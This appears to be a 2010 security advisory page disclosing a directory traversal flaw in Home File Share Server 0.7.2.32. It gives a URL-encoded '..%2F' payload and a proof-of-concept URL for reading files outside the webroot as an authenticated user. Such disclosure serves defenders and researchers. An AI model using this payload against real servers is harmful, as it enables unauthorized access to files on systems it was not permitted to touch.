Home File Share Server 0.7.2.32 directory traversal vulnerability

2010.11.04

Credit: John Leitch

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

------------------------------------------------------------------------
Software................Home File Share Server 0.7.2.32
Vulnerability...........Directory Traversal
Download................http://downstairs.dnsalias.net/homefileshareserver.html
Release Date............10/31/2010
Tested On...............Windows XP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A directory traversal vulnerability in Home File Share Server 0.7.2.32
can be exploited to read files outside of the webroot directory.


--Exploit--

..%2F

The user must be authenticated and the path must begin with a real folder.


--PoC--

http://localhost/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Home File Share Server 0.7.2.32 directory traversal vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.